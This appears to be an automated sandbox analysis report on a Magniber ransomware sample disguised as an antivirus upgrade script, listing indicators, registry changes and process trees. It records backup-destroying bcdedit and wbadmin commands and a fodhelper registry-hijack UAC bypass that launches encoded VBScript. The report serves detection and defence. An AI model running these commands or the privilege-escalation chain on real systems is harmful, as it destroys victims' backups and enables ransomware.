Analysis
-
max time kernel
149s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
15-09-2022 12:43
Static task
static1
Behavioral task
behavioral1
Sample
Antivirus_Upgrade_Cloud.b79e8f66eb124.jse
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
Antivirus_Upgrade_Cloud.b79e8f66eb124.jse
Resource
win10v2004-20220812-en
General
-
Target
Antivirus_Upgrade_Cloud.b79e8f66eb124.jse
-
Size
186KB
-
MD5
871d0084a53bb7733346b167f7e67e36
-
SHA1
2b75f4d60b357ea3cdd53a73e8dd00148fea0889
-
SHA256
9095bbb4b123a353a856634166f193124bdc4591cb3a38922b2283acc1d966d6
-
SHA512
b77f916dfe0fa3ebcd7ca7fef2df57d9e3e647a37ee90e5bdf845cc715f2ad58f7c3053d55b43d108da004ea1097826ad7dca7fde5f6f45bcb6781acbe68ddaf
-
SSDEEP
3072:S7e1lcDeY9tstU6UtjvN7MLFfOVMumRRCivI7lvLAe25gfV99p:S4uDBtstmtJouig7V99p
Malware Config
Signatures
-
Detect magniber ransomware 3 IoCs
Processes:
resource yara_rule behavioral2/memory/5036-134-0x000001AA00000000-0x000001AA01000000-memory.dmp family_magniber behavioral2/memory/2832-135-0x000001C713670000-0x000001C71367A000-memory.dmp family_magniber behavioral2/memory/5036-148-0x000001AA00000000-0x000001AA01000000-memory.dmp family_magniber -
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 12 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
bcdedit.exebcdedit.exewbadmin.exewbadmin.exebcdedit.exebcdedit.exewbadmin.exewbadmin.exebcdedit.exewbadmin.exebcdedit.exewbadmin.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1796 1688 bcdedit.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4556 1688 bcdedit.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4292 1688 wbadmin.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3692 1688 wbadmin.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4248 1688 bcdedit.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2324 1688 bcdedit.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2184 1688 wbadmin.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2828 1688 wbadmin.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 272 1688 bcdedit.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3808 1688 wbadmin.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 288 1688 bcdedit.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3444 1688 wbadmin.exe -
Modifies boot configuration data using bcdedit 1 TTPs 6 IoCs
Processes:
bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exepid process 1796 bcdedit.exe 4556 bcdedit.exe 4248 bcdedit.exe 2324 bcdedit.exe 272 bcdedit.exe 288 bcdedit.exe -
Processes:
wbadmin.exewbadmin.exewbadmin.exepid process 4292 wbadmin.exe 2828 wbadmin.exe 3444 wbadmin.exe -
Processes:
wbadmin.exewbadmin.exewbadmin.exepid process 3692 wbadmin.exe 2184 wbadmin.exe 3808 wbadmin.exe -
Modifies extensions of user files 12 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
svchost.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\StepNew.tiff svchost.exe File renamed C:\Users\Admin\Pictures\StepNew.tiff => C:\Users\Admin\Pictures\StepNew.tiff.gpbaiwzt svchost.exe File renamed C:\Users\Admin\Pictures\TestUnprotect.tiff => C:\Users\Admin\Pictures\TestUnprotect.tiff.gpbaiwzt svchost.exe File renamed C:\Users\Admin\Pictures\ConvertFromApprove.crw => C:\Users\Admin\Pictures\ConvertFromApprove.crw.gpbaiwzt svchost.exe File renamed C:\Users\Admin\Pictures\FindLimit.tif => C:\Users\Admin\Pictures\FindLimit.tif.gpbaiwzt svchost.exe File opened for modification C:\Users\Admin\Pictures\MergeRestart.tiff svchost.exe File renamed C:\Users\Admin\Pictures\MergeRestart.tiff => C:\Users\Admin\Pictures\MergeRestart.tiff.gpbaiwzt svchost.exe File opened for modification C:\Users\Admin\Pictures\TestUnprotect.tiff svchost.exe File renamed C:\Users\Admin\Pictures\CloseOpen.crw => C:\Users\Admin\Pictures\CloseOpen.crw.gpbaiwzt svchost.exe File renamed C:\Users\Admin\Pictures\OptimizeExpand.crw => C:\Users\Admin\Pictures\OptimizeExpand.crw.gpbaiwzt svchost.exe File renamed C:\Users\Admin\Pictures\ApproveStop.tif => C:\Users\Admin\Pictures\ApproveStop.tif.gpbaiwzt svchost.exe File renamed C:\Users\Admin\Pictures\RemoveUnpublish.tif => C:\Users\Admin\Pictures\RemoveUnpublish.tif.gpbaiwzt svchost.exe -
Drops file in Windows directory 6 IoCs
Processes:
wbadmin.exewbadmin.exedescription ioc process File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4928 3276 WerFault.exe DllHost.exe -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vds.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Modifies registry class 42 IoCs
Processes:
svchost.exesihost.exetaskhostw.exeRuntimeBroker.exeRuntimeBroker.exeRuntimeBroker.exeExplorer.EXEsvchost.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6" sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6" taskhostw.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute taskhostw.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer sihost.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute sihost.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings taskhostw.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/reovgnwbjymr.dd" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/tlalnak.dd" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/ajcqdaulzl.dd" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/pkdraxukxvm.dd" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/brkvvljvs.dd" sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/wgnqxdhlpv.dd" taskhostw.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/qiznxoynrf.dd" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "wscript.exe /B /E:VBScript.Encode ../../Users/Public/xyorjwvmlmgv.dd" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\DelegateExecute Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings sihost.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer taskhostw.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\CurVer svchost.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
WScript.exepid process 5036 WScript.exe 5036 WScript.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 760 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Explorer.EXERuntimeBroker.exevssvc.exewbengine.exedescription pid process Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 3428 RuntimeBroker.exe Token: SeShutdownPrivilege 3428 RuntimeBroker.exe Token: SeBackupPrivilege 3684 vssvc.exe Token: SeRestorePrivilege 3684 vssvc.exe Token: SeAuditPrivilege 3684 vssvc.exe Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeBackupPrivilege 4400 wbengine.exe Token: SeRestorePrivilege 4400 wbengine.exe Token: SeSecurityPrivilege 4400 wbengine.exe Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE Token: SeShutdownPrivilege 760 Explorer.EXE Token: SeCreatePagefilePrivilege 760 Explorer.EXE -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
WScript.execmd.exefodhelper.execmd.exefodhelper.execmd.exefodhelper.execmd.exefodhelper.execmd.exefodhelper.exedescription pid process target process PID 5036 wrote to memory of 2832 5036 WScript.exe sihost.exe PID 5036 wrote to memory of 2852 5036 WScript.exe svchost.exe PID 5036 wrote to memory of 2944 5036 WScript.exe taskhostw.exe PID 5036 wrote to memory of 760 5036 WScript.exe Explorer.EXE PID 5036 wrote to memory of 3024 5036 WScript.exe svchost.exe PID 5036 wrote to memory of 3276 5036 WScript.exe DllHost.exe PID 5036 wrote to memory of 3368 5036 WScript.exe StartMenuExperienceHost.exe PID 5036 wrote to memory of 3428 5036 WScript.exe RuntimeBroker.exe PID 5036 wrote to memory of 3528 5036 WScript.exe SearchApp.exe PID 5036 wrote to memory of 3652 5036 WScript.exe RuntimeBroker.exe PID 5036 wrote to memory of 4748 5036 WScript.exe RuntimeBroker.exe PID 5036 wrote to memory of 2864 5036 WScript.exe backgroundTaskHost.exe PID 3708 wrote to memory of 704 3708 cmd.exe fodhelper.exe PID 3708 wrote to memory of 704 3708 cmd.exe fodhelper.exe PID 704 wrote to memory of 3136 704 fodhelper.exe wscript.exe PID 704 wrote to memory of 3136 704 fodhelper.exe wscript.exe PID 2564 wrote to memory of 1332 2564 cmd.exe fodhelper.exe PID 2564 wrote to memory of 1332 2564 cmd.exe fodhelper.exe PID 1332 wrote to memory of 2672 1332 fodhelper.exe wscript.exe PID 1332 wrote to memory of 2672 1332 fodhelper.exe wscript.exe PID 2224 wrote to memory of 572 2224 cmd.exe fodhelper.exe PID 2224 wrote to memory of 572 2224 cmd.exe fodhelper.exe PID 572 wrote to memory of 2300 572 fodhelper.exe wscript.exe PID 572 wrote to memory of 2300 572 fodhelper.exe wscript.exe PID 5028 wrote to memory of 4284 5028 cmd.exe fodhelper.exe PID 5028 wrote to memory of 4284 5028 cmd.exe fodhelper.exe PID 4284 wrote to memory of 3960 4284 fodhelper.exe wscript.exe PID 4284 wrote to memory of 3960 4284 fodhelper.exe wscript.exe PID 2140 wrote to memory of 3608 2140 cmd.exe fodhelper.exe PID 2140 wrote to memory of 3608 2140 cmd.exe fodhelper.exe PID 3608 wrote to memory of 4708 3608 fodhelper.exe wscript.exe PID 3608 wrote to memory of 4708 3608 fodhelper.exe wscript.exe
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:3428 -
C:\Windows\System32\cmd.exe/c fodhelper.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\System32\fodhelper.exefodhelper.exe3⤵
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Windows\system32\wscript.exe"wscript.exe" /B /E:VBScript.Encode ../../Users/Public/qiznxoynrf.dd4⤵PID:2672
-
-
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX53ypgrj20bgndg05hj3tc7z654myszwp.mca1⤵PID:2864
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:4748 -
C:\Windows\System32\cmd.exe/c fodhelper.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\System32\fodhelper.exefodhelper.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3608 -
C:\Windows\system32\wscript.exe"wscript.exe" /B /E:VBScript.Encode ../../Users/Public/reovgnwbjymr.dd4⤵PID:4708
-
-
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:3652
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\Antivirus_Upgrade_Cloud.b79e8f66eb124.jse"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5036
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:3528
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3368
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3276
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3276 -s 9362⤵
- Program crash
PID:4928
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
- Modifies registry class
PID:3024 -
C:\Windows\System32\cmd.exe/c fodhelper.exe2⤵
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\System32\fodhelper.exefodhelper.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4284 -
C:\Windows\system32\wscript.exe"wscript.exe" /B /E:VBScript.Encode ../../Users/Public/reovgnwbjymr.dd4⤵PID:3960
-
-
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:760 -
C:\Windows\System32\cmd.exe/c fodhelper.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Windows\System32\fodhelper.exefodhelper.exe3⤵
- Suspicious use of WriteProcessMemory
PID:572 -
C:\Windows\system32\wscript.exe"wscript.exe" /B /E:VBScript.Encode ../../Users/Public/reovgnwbjymr.dd4⤵PID:2300
-
-
-
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Modifies registry class
PID:2944 -
C:\Windows\System32\cmd.exe/c fodhelper.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\System32\fodhelper.exefodhelper.exe3⤵
- Suspicious use of WriteProcessMemory
PID:704 -
C:\Windows\system32\wscript.exe"wscript.exe" /B /E:VBScript.Encode ../../Users/Public/qiznxoynrf.dd4⤵PID:3136
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
- Modifies extensions of user files
- Modifies registry class
PID:2852
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Modifies registry class
PID:2832
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 468 -p 3276 -ip 32761⤵PID:4916
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3684
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:1796
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:4556
-
C:\Windows\system32\wbadmin.exewbadmin delete systemstatebackup -quiet1⤵
- Process spawned unexpected child process
- Deletes System State backups
PID:4292
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:3692
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4400
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2592
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:4092
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:4248
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:2324
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:2184
-
C:\Windows\system32\wbadmin.exewbadmin delete systemstatebackup -quiet1⤵
- Process spawned unexpected child process
- Deletes System State backups
- Drops file in Windows directory
PID:2828
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:272
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:3808
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:288
-
C:\Windows\system32\wbadmin.exewbadmin delete systemstatebackup -quiet1⤵
- Process spawned unexpected child process
- Deletes System State backups
- Drops file in Windows directory
PID:3444
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
857B
MD5b179b9ad7d9523ca77a96719ed849079
SHA19bad1bcc6484428080fb03d22b079c0fda4985b2
SHA256d6d195a21b9c7174293c0ada29c421199b6fdca4e009b8905dcbb9f0161db9a2
SHA512162dfb7cc03e6ab7fb9afa005a01cd525806cb513e97b8b49a7f170a62f12a10ebf3529c9a4f7f28e61afe88c7a1f11d2004d3e37c502316c9c99ba0a72033e7
-
Filesize
857B
MD5b179b9ad7d9523ca77a96719ed849079
SHA19bad1bcc6484428080fb03d22b079c0fda4985b2
SHA256d6d195a21b9c7174293c0ada29c421199b6fdca4e009b8905dcbb9f0161db9a2
SHA512162dfb7cc03e6ab7fb9afa005a01cd525806cb513e97b8b49a7f170a62f12a10ebf3529c9a4f7f28e61afe88c7a1f11d2004d3e37c502316c9c99ba0a72033e7